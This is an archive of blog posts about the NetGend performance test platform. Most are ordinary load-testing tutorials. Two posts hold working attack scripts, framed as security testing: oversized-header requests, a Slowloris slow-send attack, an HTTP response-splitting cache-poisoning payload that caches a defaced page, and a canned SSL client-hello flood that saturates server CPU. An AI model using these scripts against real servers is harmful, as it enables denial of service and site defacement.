Monday, December 30, 2013

A performance test platform as Low Orbit Ion Cannon


     Network security has gained a lot of attention over the years and has become one of the top issues that keep a web site owner awake at night.  In this blog, we are going to talk about how NetGend, a performance test platform, can help with security testing.

     By nature, any powerful performance test platform can be turned into a DDoS testing platform.  The NetGend platform, with its ability to emulate 50,000 concurrent virtual clients on one box, is no exception.  Compared to the famous DDoS tool LOIC (Low Orbit Ion Cannon, a cool name!), NetGend supports more concurrent sessions and more realistic emulation of clients.

    On the NetGend platform, sophisticated clients are emulated with a JavaScript-like script.  Unlike LOIC, which can only send simple messages, NetGend can send dynamic messages with lots of moving parts (i.e. variations in the messages) and, on top of that, it can engage the victim server through complex interactions, just as good clients do.  It can really cause some pain on web servers during DDoS testing.

     First let's try to cause a buffer overflow with a long HTTP header.  In the following script, we use the built-in function "repeat" to create a "Referer" header that is 20,000 bytes long:
 function VUSER() { 
      httpHeader.Referer = repeat("A", 20000);  
      action(http, "http://www.example.com");  
 }  

     Similarly, you can add more long HTTP headers, such as a custom "XYZ" header:
    httpHeader.XYZ = repeat("A", 30000);  

     Creating HTTP requests with long headers is quite easy.  Now let's look at the Slowloris attack, which has become a popular attack against servers.  Here an attacker causes DoS on a web server by sending HTTP requests very slowly, exhausting all resources (connections) on the server.  The original Slowloris script is quite long; here we can do a simpler version in a few short lines:
 function VUSER() { 
      connect("www.example.com", 80); 
      http.POSTData = "name=jin&pass=123";  
      a = createHttpRequest("http://www.example.com/");  
      for (i = 0; i < length(a); i ++ ) {  
           send(substr(a, i, 1));  
           sleep(5000);  
      }  
 }  

   In the above script, we create a connection to the web server, create a valid HTTP POST request, and send it one character at a time, waiting 5 seconds between characters. By spawning many VUsers (up to 50,000), we chew up all the connection resources on the server.
 
    The above two examples are quite simple in concept.  To conclude this blog, let's look at an example where a lot of creativity went into crafting a special HTTP request with malicious intent - kudos to the researcher(s) who found it.  This attack is called "HTTP cache poisoning" and is documented here.

    This is an attack on the HTTP cache server. A diagram in a blog by Bertrand Baquet shows where an HTTP cache server sits in this setup.  In normal operation, when an HTTP cache server receives a request, it searches its cache; if it finds a match, it serves the response from the cache, otherwise it forwards the request to the web server and relays the web server's response back to the client.

     The idea of the attack is to send one request from the client and make the server's response appear to be two responses from the cache server's point of view.  This attack works, for example, when the web server has a dynamic page that redirects based on the incoming URL.  For example, when the incoming request is the following
http://www.example.com/redirect?page=http://www.test.com 
it will send a 302 response with the "Location" header set to "http://www.test.com".  By cleverly crafting the value of the "page" parameter, the attacker (on the client side) can control what the server sends.
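    For reference, a normal (unpoisoned) redirect response to such a request looks roughly like this - a single, well-formed response (a sketch; other headers omitted and exact headers depend on the server):
 HTTP/1.1 302 Found  
 Location: http://www.test.com  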

     In the following script, the specially crafted message is stored in the variable "poison"; we use the function "toUrl()" to escape it so it can be included as part of the URL.
 function VUSER() {  
      connect("www.example.com", 80);
      httpHeader.Pragma = "no-cache";
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg); //turn off cache
      poison = "
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2015 14:50:18 GMT
Content-Length: 21
Content-Type: text/html

<html>defaced!</html>";
      poison = toUrl(poison);
      msg = createHttpRequest("http://www.example.com/redir.php?page=${poison}");
      send(msg); //add the poison
      msg = createHttpRequest("http://www.example.com/index.html");
      send(msg);
}

    As a result, the HTTP cache server will put <html>defaced!</html> as the cached response for the home page!
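    To see why, here is roughly what the cache server receives from the web server after the poisoned redirect request, assuming the server copies the "page" parameter into the "Location" header without sanitizing it (a sketch; real servers add more headers):
 HTTP/1.1 302 Found  
 Location:   
 Content-Length: 0  

 HTTP/1.1 200 OK  
 Last-Modified: Mon, 27 Oct 2015 14:50:18 GMT  
 Content-Length: 21  
 Content-Type: text/html  

 <html>defaced!</html>  
    The first block is a complete (empty) response to the redirect request; the cache server then treats the second block as the response to the very next request on the connection - the request for index.html sent at the end of the script - and caches it.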

    From a web server owner's point of view, both security and performance are important - isn't it nice to have one platform that can test both?

Friday, December 27, 2013

How to resume an interrupted performance test



    Recently I read an interesting blog on "Handling consumable parameter data in LoadRunner" by Stu, a veteran of performance testing.  Even though it's about LoadRunner, the underlying problem is applicable to all performance test platforms.

    The problem comes up naturally when you run performance tests. Think about this scenario: you have a csv file with 100,000 users and you need to register these users.  Half way through, there is a problem or you need to leave, so the test has to be stopped.  When you come back to continue the test, you need to resume from where you left off. You can make a note (or a mental note) of where the test stopped, but that's cumbersome, especially when you have to start and stop the test multiple times.

    Stu's blog gave multiple creative solutions; however, none of them is quite simple, due to design limitations of LoadRunner.  On NetGend, we have the concept of a "permanent" variable, and it solves the problem nicely.  A variable is "permanent" if its value is stored in a permanent place (like a file). So even after the test program is stopped, the value of the variable is still there; when you run the test again, the "permanent" variable continues with the value left from the previous run.

    Permanent variables are created with the "createPermVar()" function.  It takes two parameters: the first is the name of the permanent variable, the second is the name of the file that stores the variable's value.

 createPermVar( <variableName>, <fileName>);  

    Here is a simple example that shows how to use it. The file "users.csv" contains rows of usernames and passwords.

 function userInit() {  
      createPermVar(index, "perm.txt");  
      var allUsers = fromCSV("users.csv");  
 }  
 function VUSER() {  
      x = getNext(allUsers, index);  //x[0] is username, x[1] is password
      index ++;  
      http.POSTData = "username=${x[0]}&password=${x[1]}";  
      action(http, "http://www.example.com/register");  
 }  

    In the above script, the variable "index" is a permanent variable; whenever its value changes (as with index ++), it is implicitly stored to the file.

    If the file (in this case "perm.txt") doesn't exist, the permanent variable ("index" in this case) starts with the initial value of 0 (when used as an index, it refers to the first element in an array) and the file will be created.  For example, if a run is stopped after registering 42,500 users, "perm.txt" holds 42500 and the next run picks up at row 42,501 of the csv file.

     You may be concerned about the performance impact of storing the value to a file - we all know writing to a file can be slow, especially the disk seeks.  Rest assured, storing the value in our case is actually very fast: our evaluation of this operation shows that we can achieve 2,000,000 operations per second on a slow PC.

     Now you see how the "permanent" variable works.  Does your favorite test platform have this feature?

Wednesday, December 25, 2013

Random element in an array


    In performance testing, we sometimes need to deal with a list of values.  For example, when we test an e-commerce web site, we may need to extract a list of products from a page.  With the list/array extracted, we can do operations such as randomly picking an item to view or add to the cart.  On some platforms, this logically simple operation can be a daunting job.

    I saw an interesting blog by Howard Clark on testing PeopleSoft Financials 9.0 using LoadRunner: "Randomly Selecting an Array of Values and Using That Value As A Parameter".  Here is the script to pick a random BUID, copied from that blog. It's listed here just to show how complex it is - you don't have to read it.

 int TotalNumberOfBUIDs;  
 char TotalNumberOfBUIDschar[3]; //working variable  
 char *AvailableBUIDsparam; //working variable  
 web_reg_save_param("AvailableBUIDs",  
 "LB/IC=class='PSSRCHRESULTSODDROW' >",  
 "RB/IC=",  
 "Ord=All",  
 "Search=Body",  
 "RelFrameId=1",  
 "Notfound=error",  
 LAST);  
 TotalNumberOfBUIDs=atoi(lr_eval_string("{AvailableBUIDs_count}"));  
 TotalNumberOfBUIDs = rand() % TotalNumberOfBUIDs;  
 lr_output_message("%d", TotalNumberOfBUIDs);  
 itoa(TotalNumberOfBUIDs, TotalNumberOfBUIDschar, 10); //working variable conversion  
 lr_save_string(TotalNumberOfBUIDschar, "BUIDindex");  
 AvailableBUIDsparam = lr_eval_string("{AvailableBUIDs_{BUIDindex}}");  
 lr_save_string(AvailableBUIDsparam, "BUIDs");  
 lr_save_string((lr_eval_string(lr_eval_string("{BUIDs}"))), "BUID");  
 "Name=VCHR_ERRC_WRK_BUSINESS_UNIT", "Value={BUID}", ENDITEM, //application of the value that was captured and then randomized  

    While I was impressed by the author's skill in C, I couldn't help wondering how an average test engineer would do this.  They know their test subject well, but writing such a complex C program can be well above their heads.  On the NetGend platform, it's so much easier.

 AvailableBUIDs = substring(str, "class='PSSRCHRESULTSODDROW' >", "<", "all");  
 TotalNumberOfBUIDs = length(AvailableBUIDs);
 BUIDindex = randNumber(0, TotalNumberOfBUIDs-1); //indexing is 0 based  
 BUID = AvailableBUIDs[BUIDindex];  //variable "BUID" now contains a random value.

    Even though we tried to use the same variable names as in the LoadRunner script, our script is still much shorter and easier to understand.  Here are some of the reasons for the simplicity:
  • In a NetGend script, all variables are local to an instance/Vuser.  There is no need to use API to get the value of a variable (called "parameter" in Loadrunner) into code space or write the value back to the variable after some operations in the code space.
  • NetGend supports the array variable.  In this case, the variable "AvailableBUIDs" holds the array of extracted BUIDs.
  • You can get the length of the array by the function "length()".
  • You can get any element in the array by indexing with [].  For example, AvailableBUIDs[BUIDindex] gives the (BUIDindex+1)-th element (indexing is 0-based).
    Note that the above short script (4 lines) can be made even shorter.   The readability may suffer a little bit but it's still fairly easy to understand. 
 AvailableBUIDs = substring(str, "class='PSSRCHRESULTSODDROW' >", "<", "all");  
 BUID = AvailableBUIDs[randNumber(0,length(AvailableBUIDs)-1)];  

    A good performance test platform needs to make complex test scenarios simple, not the other way around.

Monday, December 23, 2013

Performance testing in the ocean


  Vacation by cruise ship is pleasant. You get to see beautiful places, eat great food and experience fun events -- all for a low price.  I am not working for a cruise line, but I love taking cruises so much that I can't help sounding like one :-)   Cruises are not without their problems though, and one of them is internet access.  We are not talking about checking the internet every hour or every minute for news, emails, etc. - after all, you are on the cruise ship for fun - but many guests do need to share their pictures and stories with their friends and stay connected.

   So what's the issue with internet access on a cruise ship? It's slow and expensive - some plans run around $0.75/min.  Internet access on land goes through cable, DSL or wireless links, but on a cruise ship it has to go through a satellite link; that's the fundamental reason why it's slow and yet expensive. I can understand this.  What I can't understand is why the login process is so slow - it can take dozens of seconds.  The servers needed for the login process are all on the ship, and the information needed is simple - just username and password.  So my guess is that the server software was not thoroughly tested for performance.

    If you are wondering whether there is a need to do performance testing on a cruise ship,  consider the following facts:

  • There are close to 4,000 guests on the ship, many with smartphones, tablets or laptops,
  • Many will probably try internet access between two events (for example, between two shows),   
  • Users have to log in and log off multiple times - log in to check some emails, go offline to avoid the high per-minute charge, compose responses and log back in to send them. 

    I took a quick look at how I would performance-test it.  The login process itself is pretty simple - it just sends the following HTTP POST data to the server (UserID and Password changed for anonymity).
 //the following are the HTTP POST data sent to server during login
 FRM_VERB:FRM_VERB_LOGIN  
 hdnPageName:WIRELESS_LOGIN  
 UserID:jsmith  
 Pass:abc123  
 Image1.x:18  
 Image1.y:30  
    Note that there are 4 hidden fields in the form.

    If I were testing it on the NetGend platform, I could use the following script.  In a nutshell, here is what the script does:
  • In the userInit() part, it preloads a csv file, each row of which contains a username and password. 
  • In the VUSER() part, it gets the login page, "fills" the form with a username/password pair read from the csv file and does the "login".
  • Finally it logs out.
 function userInit() {  
      var db = fromCSVFile("users.txt");  
      var index = 0;  
 }  
 function VUSER() {  
      action(http,"http://10.10.10.10/login.asp");  
      a = db[index];  
      index ++;  
      info.UserID = a[0];  
      info.Pass = a[1];  
      http.POSTData = fillHtmlForm(http.replyBody, info);  
      action(http,"http://10.10.10.10/login.asp"); 
      x = randNumber(30000, 600000); //sleep randomly from 30 to 600 seconds (10min)
      sleep(x);
      action(http,"http://10.10.10.10/logoff.asp");
 }  

   Observant readers may notice that the script doesn't deal with the "hidden" fields when it sends the HTTP POST data for login. That's because the function "fillHtmlForm()" takes care of hidden parameters, so users don't have to set up complex regular expressions (or something equivalent) to capture the hidden parameters and put them back into the HTTP POST data.
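   To illustrate, here is a simplified, hypothetical sketch of what such a login form's HTML might look like (the real form is not shown here; field names are taken from the POST data above, and only two of the hidden fields are sketched):
 <form action="login.asp" method="post">  
      <input type="hidden" name="FRM_VERB" value="FRM_VERB_LOGIN">  
      <input type="hidden" name="hdnPageName" value="WIRELESS_LOGIN">  
      <input type="text" name="UserID">  
      <input type="password" name="Pass">  
      <input type="image" name="Image1" src="go.gif">  
 </form>  
   fillHtmlForm(http.replyBody, info) parses a form like this, keeps the pre-filled hidden values, and merges in the fields we set (UserID and Pass) to build the POST data.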

   The need for performance testing is everywhere - you just can't escape it, even in the middle of the ocean.

Saturday, December 14, 2013

Fun with Performance test platform


    In previous blogs, we showed that the NetGend application performance test platform can be used for business - web service performance testing.  This blog tells a story about using it for something fun.

    It started with my upcoming cruise vacation.  I planned to bring my running shoes and go to the gym every afternoon - how else can I deal with so much good food?  I used to listen to NPR while running, but in the middle of the ocean there would be no radio and no high-speed internet, so my only choice would be podcasts.  My favorite is Marketplace from APM.

    I searched the APM web site but didn't find a list of podcasts - the best I could find was yesterday's podcast.  Eventually Google brought me to this page in the Apple iTunes store.  It seemed promising.

     Unfortunately I didn't have iTunes installed on my Ubuntu PC and didn't intend to install it just to download these podcasts for my cruise vacation.  While I was a little disappointed, I noticed that the HTML page had something that looked like URLs for the podcasts (see the audio-preview-url attributes in the following).  I copied and pasted one of the values into my browser's address bar - yes, that was exactly what I had been looking for!

 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/bFRhvGqQpxg/marketplace_podcast_20131211_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-11-13 Marketplace - Certainty?" adam-id="209223815" row-number="0" class="podcast-episode">  
 ....  
 <tr parental-rating="1" rating-podcast="1" kind="episode" role="row" metrics-loc="Track_" audio-preview-url="http://feeds.americanpublicmedia.org/~r/MarketplacePodcast/~5/o6MbaCEnmbU/marketplace_segment24_20131210_64.mp3" preview-album="APM: Marketplace" preview-artist="American Public Media" preview-title="12-10-13 Marketplace - Volcker? He rules!" adam-id="207293711" row-number="1" class="podcast-episode">  
 //more than 20 of them

    To grab all the values of this attribute, we need an XPath expression like //tr/@audio-preview-url. Luckily it's supported by NetGend, so I wrote a simple script to get all the URLs for the podcasts. Downloading a podcast and writing it to disk is pretty simple.
 function VUSER() {   
      action(http, "https://itunes.apple.com/us/podcast/apm-marketplace/id201853034");  
      a = fromHtml(http.replyBody, '//tr/@audio-preview-url');  
      for (i = 0; i < getSize(a); i ++) {  
           if (match(a[i], /\/([^\/]+)$/)) {  //extract the file name from the URL
                fileName = g1;  
                println("downloading ${a[i]}");  
                action(http, a[i]);  //download this podcast URL
                writeFile(fileName, http.replyBody);  //save it to disk
           }  
      }  
 }   

   Running this gave me the podcasts, which I then transferred to my smartphone.  I was filled with joy - on the one hand, I got the podcasts I needed; on the other hand, I realized that this test platform can also be used for something other than testing!  I know there may be other tools that can do the above, but can you imagine a performance test platform being able to do it so easily?

Thursday, December 12, 2013

How bad is a security threat?




    Recently I met my friend Percy, a technical guru I respect.  Our talk inevitably moved on to something technical about SSL - how many SSL handshakes can a server support?  He sent me an interesting security threat report on DDoS against HTTPS servers.

    The report indicates that HTTPS servers may suffer from SSL re-negotiation attacks, thanks to the THC tool.  Even if re-negotiation is turned off, the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol, so it remains an attack vector.

    To get an idea of how bad the server CPU exhaustion can be, I started Wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake.  An SSL handshake involves multiple steps; the first step is that the client sends a client-hello message to the server.  According to the capture, just replying to a client-hello message costs the server about 5ms of intensive computation (my server has an AMD quad-core CPU: Athlon II X4 645, 3.1 GHz) - roughly speaking, that caps a single core at about 200 client-hellos per second.

    Our NetGend platform can set up tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side while still keeping the server busy.  Some SSL handshake steps may cause the client side to do nontrivial computations too, so it's better to send a canned client-hello message, which costs the client almost no computing time.

    First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".

 16 03 01 00 cc 01 00 00 c8 03 01 52 a2 93   
 34 0b 60 fd c9 59 ba 0c 8a 38 cc c7 b4 96 fa 50   
 09 cc 46 f2 40 2b e1 12 e7 99 3e 98 25 00 00 5a   
 c0 14 c0 0a 00 39 00 38 00 88 00 87 c0 0f c0 05   
 00 35 00 84 c0 12 c0 08 00 16 00 13 c0 0d c0 03   
 00 0a c0 13 c0 09 00 33 00 32 00 9a 00 99 00 45   
 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07   
 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14   
 00 11 00 08 00 06 00 03 00 ff 02 01 00 00 44 00   
 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 01 00   
 02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00   
 0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00   
 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00   
 23 00 00   

   Then we create the following script to run on the NetGend platform.
 function userInit() {  
      var data = readFile("clientHello.txt");  
      data = fromHexString(data);  //this will convert hex bytes to binary data
 }  
 function VUSER() {  
      connect("10.3.0.3", 443);  
      send(data);  
      recv(msg);  
      //close() is unnecessary, the connection will be closed at the end of VUser.
 }  

     The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz), but when it sends the client-hello messages at a rate of about 2,900/second (over multiple connections), the server side is almost completely busy (note the CPU idle percentage, 0.3%id, in the top output below).
 Tasks: 265 total,  2 running, 260 sleeping,  0 stopped,  3 zombie  
 Cpu(s): 81.8%us, 15.0%sy, 0.0%ni, 0.3%id, 0.0%wa, 0.0%hi, 2.8%si, 0.0%st  
 Mem: 16177816k total, 14040884k used, 2136932k free,  524640k buffers  
 Swap: 3929084k total,    0k used, 3929084k free, 9915940k cached  
  PID USER   PR NI VIRT RES SHR S %CPU %MEM  TIME+ COMMAND                     
 18152 www-data 20  0 1961m 4008 1248 S  61 0.0  6:28.21 /usr/sbin/apache2 -k start            
 18462 www-data 20  0 1961m 4012 1248 S  61 0.0  0:41.27 /usr/sbin/apache2 -k start            
 18578 www-data 20  0 1961m 3984 1136 S  60 0.0  0:06.15 /usr/sbin/apache2 -k start            
 18151 www-data 20  0 1961m 4008 1248 S  59 0.0  6:26.73 /usr/sbin/apache2 -k start            
 18354 www-data 20  0 1961m 4644 1592 S  59 0.0  4:10.70 /usr/sbin/apache2 -k start            
 18490 www-data 20  0 1961m 3964 1104 S  59 0.0  0:40.16 /usr/sbin/apache2 -k start     
 17227 admin    20   0 3470m 2.2g 2.2g S   32 14.1  18:15.93 /usr/lib/vmware/bin/vmware-vmx -ssnapshot.num
    The VM process used to take 10% of one core; it takes much more now due to CPU resource contention.  While I can still use a real browser to access HTTPS pages, it's clear that the server is VERY busy.

    So, it's good to be aware of a possible security threat, and it's even better to get some idea of how bad it can be - peace of mind matters.  NetGend can give you that peace of mind.

Tuesday, December 10, 2013

Performance testing on REST API


    RESTful APIs hold great promise for simplifying the development of web/smartphone apps and for handling a large number of clients.  How can we effectively test servers that support RESTful APIs?

   To load-test a RESTful service, we need to be able to generate HTTP requests with methods like "PUT", "DELETE", etc.  They may not be as familiar as GET and POST, but on the NetGend platform it's easy to emulate just about any HTTP method:

 http.method = "PUT";  
 //or  
 http.method = "DELETE".  

    Note that by default the HTTP method is "GET" on the NetGend platform.  If you need the HTTP POST method, you can either set it explicitly or simply provide HTTP POST data:
 http.method = "POST";  
 //or just specify there is http POST data.  
 http.POSTData = "name=john&city=houston";  

    When you generate the HTTP body in JSON format (say, for an HTTP POST message), you can either use a template or use the function combineHttpParam:
 http.POSTData = q|{ "name": "john", "city": "Houston", "age": "23"}|;  
 //or  
 person.name = "john";  
 person.city  = "Houston";  
 person.age  = 23;  
 http.POSTData = combineHttpParam(person);  

    Did you notice that you don't have to escape the double quotes in the template?  On other test platforms you may have to write { \"name\": \"john\", \"city\": \"Houston\", \"age\": \"23\"} instead.  If you think escaping is a pain, you are not alone!  Now you understand why I think it's a pleasure to do it on the NetGend platform.

    The URL path of a RESTful request may look like the following:
/rest/8af909ffefa9/getDistance.json/10001/20002/mile, and it can be generated in two ways.

 //method 1, by variable substitution 
 /rest/${apiKey}/getDistance.json/${zip1}/${zip2}/${unit}  
 //assume you have the variables defined  
or
 //method 2, by joining an array
 a[0] = apiKey;  
 a[1] = "getDistance.json";  
 a[2] = zip1;  
 a[3] = zip2;  
 a[4] = "mile"; //can have other unit  
 apiMsg = join(a, "/");  
 action(http, "http://www.example.com/rest/${apiMsg}");  

    HTTP responses for RESTful services are increasingly in JSON format.  Parsing a JSON message is pretty simple on the NetGend platform and has been covered many times in previous blogs.  The following is an example of a JSON message from a site that implements a "todo" list.

 [ {"id": 1,  
     "text": "reserve lunch"  
    }, {"id": 2,  
     "text": "fix mower"  
    }, {"id": 3,  
     "text": "buy grocery"  
    }]  

     Let's put all these together and test the RESTful site for the "todo" list by implementing the following sequence:
  • Get the list of existing "todos"
  • Randomly delete one of them
  • Add a new one 
  • Update a random "todo"

 action(http, "http://www.example.com/todos/"); 

 //delete a random one 
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{"id": ${id}}|;  
 http.method = "DELETE";  
 action(http, "http://www.example.com/todos");  

 //add a new one  
 http.POSTData = q|{"text": "talk to insurance agent"}|;  
 action(http, "http://www.example.com/todos");  

 //update
 action(http, "http://www.example.com/todos/");  
 resp = fromJson(http.replyBody);  
 id = randNumber(1, getSize(resp) );  
 http.POSTData = q|{ "text": "updated content!", "id": ${id}}|;  
 http.method = "PUT";  
 action(http, "http://www.example.com/todos");  

    There are obviously more test scenarios; I am sure they will feel just as pleasant as this one!

Sunday, December 8, 2013

goto considered helpful (in some cases)!


    There are occasional debates on whether it's good to have "goto" statements in a program, or even in a programming language.  The typical argument from a proponent is a little weak: "goto" can help jump out of a nested loop. As far as I can see, the proponents are typically on the losing side.  Sadly, I am one of them.  In this blog, we are going to present a better argument: using "goto" can be natural for a certain audience in some cases.

    Some developers may argue that we can use "if", "while", etc. to accomplish what "goto" statements can do.  Yes, that's true, but it doesn't feel natural and easy for our audience: people without a lot of programming background.  "goto" (or jump) feels more familiar to them.

   On the NetGend test platform, we use JavaScript syntax. It may appear impossible to support "goto", since the JavaScript language itself doesn't support it, but we came up with the following way around it: to set a label, you call the function "setLabel(<labelName>)"; to jump to a label, you call "goto(<labelName>)".

    Here is a simple example to illustrate how it is used.
  function VUSER() { 
      id = 2; 
      println("start");  
      setLabel("test1");  // <--- set the label here
      println("hello"); 
      id --; 
      if (id > 0) {  
            goto("test1"); // <--- jump to label
      }  
      println("world");
 }  

    In this example, the println("hello"); statement is executed twice (the second time due to the "goto" statement), so the output is
 start  
 hello  
 hello  
 world  

    Now let's look at an example that's a little more realistic: we need to emulate sensors trying to register with a master. The master node may ask a sensor node to wait a little bit and try again.

 function VUSER() {
       connect("1.1.1.1", 12345);  
       setLabel("register");  
       send("register by ${userId}");  
       recv(response);  
       if (match(response, /please wait (\d+) ms/)) {  
          sleep(g1);  
          goto("register");  
       }  
       //now send data to master 
}

    It's true that the above logic can be done with a while loop, but it's much easier for a test engineer to understand the logic if we use "goto" here.
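    For comparison, here is a sketch of the same retry logic written with a while loop, using the same functions as above - whether it reads as naturally is a matter of taste:
 function VUSER() {
       connect("1.1.1.1", 12345);  
       send("register by ${userId}");  
       recv(response);  
       while (match(response, /please wait (\d+) ms/)) {  //keep retrying while the master asks us to wait
            sleep(g1);  
            send("register by ${userId}");  
            recv(response);  
       }  
       //now send data to master 
 }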

    Finally, as a simple real-world example, we need to emulate a user who visits an e-commerce site, with the following distribution:
  • 70% probability: the user will just browse a product
  • 20% probability: the user will exit the site
  • 10% probability: the user will register and continue to browse products
 function VUSER() {
       action(http, "http://www.example.com");  
       isRegistered = 0;  
       browsePercentage = 70;
       exitPercentage = 20;
       registerPercentage = 10;

       setLabel("userAction");  //<--- let the fun start
       if (isRegistered == 0) {  
            choice = rolldice([browsePercentage, exitPercentage, registerPercentage]);  
       } else if (isRegistered == 1) {  
            choice = rolldice([browsePercentage, exitPercentage]);  
       }  
       if (choice == 0) { //browse product
            //pick a product and view it  
       } else if (choice == 1) { //exit site  
            return 1;  
       } else { //register  
            //register actions
            isRegistered = 1;  
            browsePercentage += registerPercentage;  
        }  
       goto("userAction");  
}
    The rolldice() function above picks a choice (0-based) according to the percentages. Based on the value of choice, we perform one of the 3 actions and go back to "userAction" to decide what to do next.
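    As a quick sanity check of how rolldice() behaves - a sketch, assuming it takes an array of percentages and returns a 0-based index as described above - you could count its choices over many calls:
 function VUSER() {  
      counts = [0, 0, 0];  
      for (i = 0; i < 1000; i ++) {  
           choice = rolldice([70, 20, 10]);  
           counts[choice] ++;  
      }  
      println("${counts[0]},${counts[1]},${counts[2]}");  //expect roughly 700, 200, 100
 }  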

    The human mind is wired to understand "goto" quickly; let's keep it that way for performance testing.

Friday, December 6, 2013

Performance testing on an online library



     Recently we tested an online library. This library serves many technical documents, each in the form of a book.  Users can search and read the books entirely from their browsers.  We needed to find the capacity of this library, defined as the number of users that can use it concurrently and still have a positive experience.

   The development team had gone out of their way to make the user experience as pleasant as possible.  For example, when a user flips a page, it loads immediately, because the system pre-loads the next page while the user is reading the current one.  Assuming a user spends an average of 20 seconds reading a page, we want to find out how many users the library can serve while most page-loading times stay within 20 seconds.

   In summary, here is a simple test scenario:
  • user login to the library
  • pick a book
  • go to a random page in the book and read all the way to the last page. 
     The login step is relatively simple, and so is the step of getting a list of books.  The hard part is emulating a user flipping through the pages.  The web page representing a book contains a flash application.  According to the developer tool, when the user flips to the next page, the flash application sends an HTTP request like the following:
 .../<bookId>/<prefix><pageNumber>.swf  

    It's easy to find the list of book IDs.  However, it's not so easy to find the following:

  • "prefix" (it varies with the bookId)
  • max pages of the book - used to generate a random page in the book
    Luckily, the following blob of text in the HTML page of the book has the information we need.
 function(){setPreviewSource('/123456789/410/{ef[*,0].swf,96}&DownloadEnabled=false&PrintEnabled=false&PrintOnePageEnabled=false','/bitstream/123456789/410/3/ef.js','/bitstream/123456789/410/2/6515695376  

     With this observation, we can easily write a script to extract those fields:
  • the URL path (the part right after "setPreviewSource('" and before the "{"), 
  • the prefix ("ef" in the blob above),
  • the max number of pages (96 in the blob above).
     We are going to use the regular expression /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/ to do the extraction.
 //script A
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = "jsmith@example.com";   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      for (id = 1; id < 500; id ++) {  
           action(http, "http://www.example.com/handle/123456789/${id}");  
            if (match(http.replyBody, /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/)) {  
                println("${g1},${g2},${g3}");  
           }  
      }  
      action(http,"http://www.example.com/logout");   
 }  
     Note that the variables g1, g2, g3 hold the 3 fields captured by the regular expression. We run the script with 1 VUser and collect the output of "println" to produce a csv file (say, "books.csv"), which we will use in the next step.  The csv file looks like:
 ...  
 /123456789/410,ef,96  
 ....  

    On a side note, this shows that our platform can be used not only for performance testing; it can also be used to build handy tools :-)

    Now we are going to use the csv file in the implementation of the test scenario.

  //script B
 function userInit() {  
      var db = fromCSV("books.csv");  
 }  
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = toUrl("jsmith@example.com");   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      a = getNext(db);  

      for(num = randNumber(1, a[2]); num <= a[2]; num ++ ) {
           action(http,"http://www.example.com/handle/${a[0]}${a[1]}${num}.swf");  
           if (http.totalRespTime > 20000) {  
                print("${http.totalRespTime},${http.url}");  
           }
      }
 }  
     Here the function call getNext(db) grabs the next row of the csv file; each row consists of 3 elements - URL path, prefix and max pages - denoted by a[0], a[1], a[2] respectively.  So randNumber(1, a[2]) simply picks a random page in this book.
     We ran script B multiple times, each time with a different number of VUsers, and found the largest number of VUsers for which the response times were still acceptable.  The development team was quite happy with how simple the scripts are; they had tried JMeter, which was not as flexible.

    Developing an online library can be challenging; performance testing it doesn't have to be.  What do you think?

Tuesday, December 3, 2013

Use caution when migrating to the cloud

     Cloud platforms have become increasingly popular thanks to better sharing of hardware resources, and more and more services are being migrated to them.  However, along with the benefits come some performance concerns that we are going to look at in this blog.

    Recently I did a performance test against an online library.  We need to log in to the site, pick a book and emulate a user browsing through the pages of the book.

    It's fairly easy to develop the script on the NetGend platform (URLs and names are obscured to keep the site anonymous):
 function VUSER() {  
      action(http,"http://www.example.com"); //this step will get a sessionID in cookie  
      a.login_email = toUrl("jsmith@example.com");  
      a.login_password = "abc123";  
      http.POSTData = combineHttpParam(a);  
      action(http,"http://www.example.com/password-login");  

      for (id = 1; id < 340; id ++) {  
           action(http,"http://www.example.com/1234567/19/11h${id}.swf");  
           println("${id},${http.totalRespTime},${http.url}");  
      }  
 }  

    To my surprise, the response times (defined as the time between the transmission of the HTTP request and the last packet of the HTTP response) varied from 234ms to 1911ms.  Since the HTTP response sizes for these transactions are about the same, I wondered what caused the variation in response times.

    Luckily I have a friend called "wireshark", the world's most famous packet sniffer.  According to the packet capture shown in Wireshark, there is a range of packets with long delays between them.  There are no dropped packets (hence no packet re-transmissions) here, so two possibilities are left:
  • Delay was caused by the server.
  • Delay was caused by the network elements (like routers) along the path between the server and my PC.
    At this point, it appears impossible to determine which one is the real cause.  Thanks to the TCP timestamp option (which is turned on by default), it's actually possible to determine where the delay happened.  Why? Because the timestamp in the TCP option (the last part of the TCP header, if present) is set by the server when a TCP packet is sent. By comparing the variation in the TCP timestamps with the variation in the capture times, we can infer whether the delay was caused by the server or the network.

    Here is what I gathered from the wireshark packet capture:

 1 0.000000000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 2 0.000375000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 3 0.000500000 192.168.5.105 38922 1.1.1.1 80 TSval 66747395  
 4 0.000675000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 5 0.035894000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383936  
